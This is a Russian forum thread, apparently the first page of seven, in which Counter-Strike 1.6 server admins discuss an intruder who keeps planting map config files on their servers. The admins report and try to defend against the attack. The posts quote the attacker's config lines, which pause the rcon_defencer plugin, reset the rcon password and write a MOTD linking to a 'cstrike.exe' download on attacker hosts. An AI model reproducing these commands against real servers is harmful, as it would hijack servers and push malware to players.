Наши новости:

14-дек	Добавлена поддержка utf8mb4
24-апр	Telegram группа
10-апр	Обновление PHP
11-апр	Раздача читов

Создание, настройка и продвижение counter-strike 1.6 серверов > > Создание, настройка и продвижение counter-strike 1.6 серверов > Защита Игрового сервера > Некто заливает конфиги, меняет ркон, меняет motd.

Важная информация

Перед тем как создать тему или задать вопрос, ознакомьтесь с данной темой, там собраны наиболее распространенные уязвимости и способы устранения.
Так же не поленитесь воспользоваться поиском, вполне возможно, что ваш вопрос уже поднимался на форуме.
При создании новой темы уделите внимание ее названию, оно должно кратко описывать суть вашего вопроса/проблемы. Все вновь созданные темы с названиями "Помогите", "Объясните", "Подскажите" и т.д. будут удалены, а их авторы наказаны.

7 страниц

1 2 ... 5 6 »

Некто заливает конфиги, меняет ркон, меняет motd.

, Обсуждалось не раз, но все решения не помогли.

Опции

A1on3	27.6.2013, 10:18 Сообщение #1
Стаж: 12 лет Город: Петербург Сообщений: 1131 Благодарностей: 2962 Полезность: 1309	Доброго времени суток, уважаемые. Итак. Буквально вчера днём, пока был на работе, мне написали, что на месте моего мотд размещена картинка с голой бабой. Я с телефона только смог переименовать motd.txt, чтобы его вообще отключить. Вечером веселье продолжилось. Я меняю мотд на свой, через некоторое время, он опять меняется. Причём содержание не одно и то же всегда, а несколько вариантов. motd.txt http://zeal1209.no-ip.org/cstrike.exe motd.txt http://31.200.239.201/cstrike.exe motd.txt <html><meta http-equiv="content-type" content="text/html; charset=windows-1251"><center><h1>PwNeD by AzazeL.</h1><h2>Chernomorets - Odessa RULEZZ</h2><img src="http://25.media.tumblr.com/9342795897ff09b4d4a8dd1dc74ae92f/tumblr_mm8657yoWl1rg83rpo1_1280.jpg"><br>botnet romana suge pula</center>#2846</html> Почитал форум и предпринял действия, как сказано тут. А именно: 1. Цитата Уязвимость "появляются конфиги :D" Решение: Патченная библиотека от Crock-а, архив upfile в аттаче - надо переименовать и заменить вашу. Скачанный файл имеет название engine_i686_p2.so, а мой - engine_amxx_i386.so. Как и было сказано, переименовал скачанный и заменил им свой. 2. Цитата Если вас уже поимели, то не забудьте удалить лишние конфиги addons/metamod/exec.cfg amxmodx/configs/maps/.cfg В addons/metamod левых конфигов не было, а вот в amxmodx/configs/maps было 3 штуки с нехорошим содержанием: файл main.cfg motdfile motd.txt motd_write http://zeal1209.no-ip.org/cstrike.exe amxx pause rcon_defencer.amxx rcon_password zhenya файл prefix_awp.cfg motdfile motd.txt motd_write http://zeal1209.no-ip.org/cstrike.exe amxx pause rcon_defencer.amxx rcon_password zhenya файл prefix_de.cfg motdfile motd.txt motd_write http://zeal1209.no-ip.org/cstrike.exe amxx pause rcon_defencer.amxx rcon_password zhenya 3. Цитата Программа для подбора rcon пароля сервера:* Решение: Установить сложный и длинный rcon пароль или убрать его вообще. Так же можно использовать этот плагин для шифрования ркон пароля. Вообще убрал ркон в server.cfg Скачал исходник версии 1.2, квар rcon_defencer_type выставил на значение 1 (используется rcon_defencer.ini в качестве белого списка, а именно только указанные в файле IP адреса имеют доступ к RCON.) и вписал свой IP. Зашифровал rcon в MD5 и вставил в сорец. Поставил модуль Orpheu и два дополнительных файла в addons/amxmodx/configs/orpheu/functions не забыл кинуть. Результат. Сделал рестарт, ркон-доступ в HLSW вернулся. Забыл посмотреть amx_plugins и amx_modules. Пошёл спать. Утром не работал Admin_ESP. Вот что сказали лог-файл, amx_plugins и amx_modules: log Error: L 06/27/2013 - 09:57:21: [AMXX] Couldn't find "AMX_Query" or "AMXX_Query" (file "cstrike/addons/amxmodx/modules/engine_amxx_i386.so") L 06/27/2013 - 09:57:21: [AMXX] Plugin "admin_spec_esp.amxx" failed to load: Module/Library "engine" required for plugin. Check modules.ini. amx_plugins unknown unknown unknown admin_spec_esp. bad load AutoRestart 1.0 Crash94 autorestart.amx stopped amx_modules MySQL 1.8.1.3746 AMX Mod X Dev Team running FakeMeta 1.8.1.3746 AMX Mod X Dev Team running CStrike 1.8.1.3746 AMX Mod X Dev Team running CSX 1.8.1.3746 AMX Mod X Dev Team running Fun 1.8.1.3746 AMX Mod X Dev Team running unknown unknown unknown bad load (Engine) nVault 1.8.1.3746 AMX Mod X Dev Team running Ham Sandwich 1.8.1.3746 AMX Mod X Dev Team running Orpheu 2.3 joaquimandrade running GeoIP 1.8.1.3746 AMX Mod X Dev Team running Вернул назад файл engine_amxx_i386.so, отключив патченный. RCON Defencer встал на паузу, появились конфиги в amxmodx/congigs/maps и опять motd.txt был изменён. prefix_de.cfg motdfile motd.txt motd_write http://31.200.239.201/cstrike.exe amxx pause rcon_defencer.amxx rcon_password zhenya prefix_cs.cfg motdfile motd.txt motd_write http://31.200.239.201/cstrike.exe amxx pause rcon_defencer.amxx rcon_password zhenya main.cfg motdfile motd.txt motd_write http://31.200.239.201/cstrike.exe amxx pause rcon_defencer.amxx rcon_password zhenya motd amx_plugins AMXBans: Core Gm 1.6 Larte Team amxbans_core.am running AMXBans: Main Gm 1.6 Larte Team amxbans_main.am debug Admin Commands 1.8.1.3746 AMXX Dev Team admincmd.amxx running Menus Front-End 1.8.1.3746 AMXX Dev Team menufront.amxx running Commands Menu 1.8.1.3746 AMXX Dev Team cmdmenu.amxx running Players Menu 1.8.1.3746 AMXX Dev Team plmenu.amxx running Maps Menu 1.8.1.3746 AMXX Dev Team mapsmenu.amxx running Admin Chat 1.8.1.3746 AMXX Dev Team adminchat.amxx running Anti Flood 1.8.1.3746 AMXX Dev Team antiflood.amxx running Admin Votes 1.8.1.3746 AMXX Dev Team adminvote.amxx running Pause Plugins 1.8.1.3746 AMXX Dev Team pausecfg.amxx running Stats Configurati 1.8.1.3746 AMXX Dev Team statscfg.amxx running Restrict Weapons 1.8.1.3746 AMXX Dev Team restmenu.amxx running CS Misc. Stats 1.8.1.3746 AMXX Dev Team miscstats.amxx running Fix AutoBuy Bug 1.1 PomanoB & UFPS.T autobuybugfix.a running Anti Fullupdate S 2.0 Pike anti_fullupdate running WeaponMenu Only A 1.0 UNREAL weaponmenu_only running Rock the Ban 1.0 Sho0ter rock_the_ban.am running Autoresponder/Adv 0.5 MaximusBrood ad_manager.amxx running Better High Ping 2.6 Lev bhpk.amxx running unknown unknown unknown admin_spec_esp. bad load Reset Score 1.0 Silenttt resetscore.amxx running Admin Check 1.51 OneEyed admin_check.amx running StatsX (MastaMan 1.8.1.3746 AMXX Dev Team statsx_shell.am running UFPS Map Manager 3.0.3(z) UFPS.Team umm.amxx running UFPS MOTD Notific 1.0 UFPS.Team umm_notificatio running UFPS Anti Blocker 2.0 UFPS.Team umm_antiblocker running Demo Recorder 1.6 Sho0ter demorecorder.am running Admin Free Look 2.0 Jim admin_freelook. running Instant AutoTeamB 1.2.0 ConnorMcLeod instant_autotea running UFPS Away From Ke 2.9 UFPS.Team ufps_afk.amxx running AutoRestart 1.0 Crash94 autorestart.amx stopped ST NOST VC 0.0 Quit voice_fix.amxx running c4 timer 1.1 cheap_suit c4timer.amxx running VIP 1.0 ill vip.amxx running AMXBans: Screens Gm 1.6 Larte Team amxbans_ssban.a running RCON Defencer 1.2 DJ_WEST rcon_defencer.a paused Colored Translit 3.0 Sho0ter colored_transli running Хотелось бы всё-таки избавиться от этого вредителя с вашей помощью. Спасибо за внимание. Отредактировал: A1on3, - 27.6.2013, 10:26
	Поблагодарили 0 раз Поблагодарили 0 раз

Vitaliy	27.6.2013, 10:28 Сообщение #2
Стаж: 14 лет Сообщений: 2431 Благодарностей: 526 Полезность: 609 Меценат	Выставите просто права на файлы, должно помочь или мне в скайп стучи
	Поблагодарили 0 раз Поблагодарили 0 раз

Cracky	27.6.2013, 10:35 Сообщение #3
Стаж: 15 лет Сообщений: 768 Благодарностей: 197 Полезность: 506	chmod, если линуховый сервер.
	Поблагодарили 0 раз Поблагодарили 0 раз

ops244	27.6.2013, 11:21 Сообщение #4
Стаж: 15 лет Сообщений: 958 Благодарностей: 939 Полезность: 0	я поставил "только чтение" и пох...
	Поблагодарили 0 раз Поблагодарили 0 раз

neygomon	27.6.2013, 11:37 Сообщение #5
Стаж: 14 лет Сообщений: 1644 Благодарностей: 515 Полезность: 363	A1on3, Вы не тот engine переименовали. Надо переименовывать тот, который в корне сервера, там где hlds_run(на хостинге скорее всего туда доступа нет) Пилите саппорт хоста, если хост конечно;)
	Поблагодарили 1 раз Поблагодарили 1 раз A1on3

SiziF	27.6.2013, 11:58 Сообщение #6
Стаж: 15 лет Сообщений: 1042 Благодарностей: 133 Полезность: 18	ТУплю.. в аттаче - надо переименовать и заменить вашу. чо де переименовать?
	Поблагодарили 0 раз Поблагодарили 0 раз

ops244	27.6.2013, 12:20 Сообщение #7
Стаж: 15 лет Сообщений: 958 Благодарностей: 939 Полезность: 0	Цитата(SiziF @ 27.6.2013, 12:58) ТУплю.. в аттаче - надо переименовать и заменить вашу. чо де переименовать? да можешь уже не переименовывать, не спасает уже это... ставишь права на "только чтение" для motd.txt, server.cfg, папку metamod, и ещё надо оставить папку, которую заливают amxmod-configs-maps и в ней оставить какой-нибудь файл (чистый) и тоже тока чтение(на папку). вроде тупо, но больше не зальют Отредактировал: ops244, - 27.6.2013, 12:38
	Поблагодарили 0 раз Поблагодарили 0 раз

SiziF	27.6.2013, 12:33 Сообщение #8
Стаж: 15 лет Сообщений: 1042 Благодарностей: 133 Полезность: 18	ну у мну на последнем билде.не стим,все гуд.Ничо такого нима
	Поблагодарили 0 раз Поблагодарили 0 раз

A1on3	27.6.2013, 15:06 Сообщение #9
Стаж: 12 лет Город: Петербург Сообщений: 1131 Благодарностей: 2962 Полезность: 1309	Цитата(Pro(X-Gamer)Pro @ 27.6.2013, 12:28) Выставите просто права на файлы, должно помочь Можно подробнее? Сервер на хостинге, доступ через фтп к корню. Цитата(Cracky @ 27.6.2013, 12:35) chmod, если линуховый сервер. Тот же вопрос - можно подробнее?) Сервер на Линуксе разумеется. Цитата(ops244 @ 27.6.2013, 13:21) я поставил "только чтение" и пох... В других темах говорят не помогает. Цитата(neygomon @ 27.6.2013, 13:37) A1on3, Вы не тот engine переименовали. Надо переименовывать тот, который в корне сервера, там где hlds_run(на хостинге скорее всего туда доступа нет) Речь об этом? Скрин Цитата(ops244 @ 27.6.2013, 14:20) да можешь уже не переименовывать, не спасает уже это... ставишь права на "только чтение" для motd.txt, server.cfg, папку metamod, и ещё надо оставить папку, которую заливают amxmod-configs-maps и в ней оставить какой-нибудь файл (чистый) и тоже тока чтение(на папку). вроде тупо, но больше не зальют Как через фтп-клиента это произвести? Есть пункт в контекстном меню "Права доступа к файлу" и там три категории - Права владельца, Групповые права и Публичные права. На motd.txt, например, установлены галочки на владельце чтение и запись, для остальных только чтение. Отредактировал: A1on3, - 27.6.2013, 15:07
	Поблагодарили 0 раз Поблагодарили 0 раз

I to doo	27.6.2013, 15:13 Сообщение #10
Стаж: 14 лет Сообщений: 16 Благодарностей: 1 Полезность: 0	Цитата(ops244 @ 27.6.2013, 13:20) да можешь уже не переименовывать, не спасает уже это... ставишь права на "только чтение" для motd.txt, server.cfg, папку metamod, и ещё надо оставить папку, которую заливают amxmod-configs-maps и в ней оставить какой-нибудь файл (чистый) и тоже тока чтение(на папку). вроде тупо, но больше не зальют Да думаю это безполезно. (переименовывать в maps) Мне сначала по 2-3 файла кидали, а потом штук так 15)
	Поблагодарили 0 раз Поблагодарили 0 раз

A1on3	27.6.2013, 15:32 Сообщение #11
Стаж: 12 лет Город: Петербург Сообщений: 1131 Благодарностей: 2962 Полезность: 1309	Цитата(I to doo @ 27.6.2013, 17:13) Да думаю это безполезно. (переименовывать в maps) Мне сначала по 2-3 файла кидали, а потом штук так 15) Какое в итоге решение сей проблемы?)
	Поблагодарили 0 раз Поблагодарили 0 раз

ops244	27.6.2013, 16:56 Сообщение #12
Стаж: 15 лет Сообщений: 958 Благодарностей: 939 Полезность: 0	Цитата(A1on3 @ 27.6.2013, 15:06) Можно подробнее? Сервер на хостинге, доступ через фтп к корню. Как через фтп-клиента это произвести? Есть пункт в контекстном меню "Права доступа к файлу" и там три категории - Права владельца, Групповые права и Публичные права. На motd.txt, например, установлены галочки на владельце чтение и запись, для остальных только чтение. ставишь на все 3 категории только чтение и всё Отредактировал: ops244, - 27.6.2013, 16:56
	Поблагодарили 0 раз Поблагодарили 0 раз

farag1	27.6.2013, 17:09 Сообщение #13
Стаж: 16 лет Сообщений: 172 Благодарностей: 71 Полезность: < 0	Ха, ZeaL опять развлекается! :) Собственно, jenya - это его имя.
	Поблагодарили 0 раз Поблагодарили 0 раз

Kristl	27.6.2013, 17:22 Сообщение #14
Стаж: 14 лет Сообщений: 329 Благодарностей: 96 Полезность: 215	Цитата(farag1 @ 27.6.2013, 18:09) Собственно, jenya - это его имя. Собственно ты кэп
	Поблагодарили 1 раз Поблагодарили 1 раз farag1

farag1	27.6.2013, 17:52 Сообщение #15
Стаж: 16 лет Сообщений: 172 Благодарностей: 71 Полезность: < 0	Ну, так можно подумать, что от балды написано. Кстати, убить вы его не сможете - в Уссурийске проживает. :)
	Поблагодарили 0 раз Поблагодарили 0 раз

Kristl	27.6.2013, 17:54 Сообщение #16
Стаж: 14 лет Сообщений: 329 Благодарностей: 96 Полезность: 215	Цитата(farag1 @ 27.6.2013, 18:52) Ну, так можно подумать, что от балды написано. Кстати, убить вы его не сможете - в Уссурийске проживает. :) кореш твой чтоли ?
	Поблагодарили 0 раз Поблагодарили 0 раз

cs-portal	27.6.2013, 17:55 Сообщение #17
Стаж: 16 лет Сообщений: 8181 Благодарностей: 2709 Полезность: 0	он мне говорил во владивостоке
	Поблагодарили 0 раз Поблагодарили 0 раз

djabiroff	27.6.2013, 18:00 Сообщение #18
Стаж: 15 лет Сообщений: 8 Благодарностей: 1 Полезность: 0	тоже такая же проблема, в metamod файлы какие то exec.cfg в configs/maps папка тоже с какими то файлами, и еще cmd.cfg ркон пароль на сервере был "zhenya" все файлы удалил, но думаю это будит повторяться, кто решил проблему опишитесь
	Поблагодарили 0 раз Поблагодарили 0 раз

Kristl	27.6.2013, 18:02 Сообщение #19
Стаж: 14 лет Сообщений: 329 Благодарностей: 96 Полезность: 215	Цитата(djabiroff @ 27.6.2013, 19:00) тоже такая же проблема, в metamod файлы какие то exec.cfg в configs/maps папка тоже с какими то файлами, и еще cmd.cfg ркон пароль на сервере был "zhenya" все файлы удалил, но думаю это будит повторяться, кто решил проблему опишитесь только чтение ставишь на всё это дерьмо
	Поблагодарили 1 раз Поблагодарили 1 раз djabiroff

djabiroff	27.6.2013, 18:03 Сообщение #20
Стаж: 15 лет Сообщений: 8 Благодарностей: 1 Полезность: 0	это кстати единственная дыра на сервере которую я не закрыл пока, все остальное вроди не прокатывает, кому не лень протестите сервер amglan.ru Цитата(Kristl @ 27.6.2013, 18:02) только чтение ставишь на всё это дерьмо на всех этих папках стоит только чтение, или надо на те файлы ставить и не удалять их?
	Поблагодарили 0 раз Поблагодарили 0 раз

« Предыдущая тема · Защита Игрового сервера · Следующая тема »

7 страниц

1 2 ... 5 6 »

0 пользователей и 1 гостей читают эту тему:

Режим отображения: Стандартный · Переключить на: Линейный · Переключить на: Древовидный

Сообщить другу · Версия для печати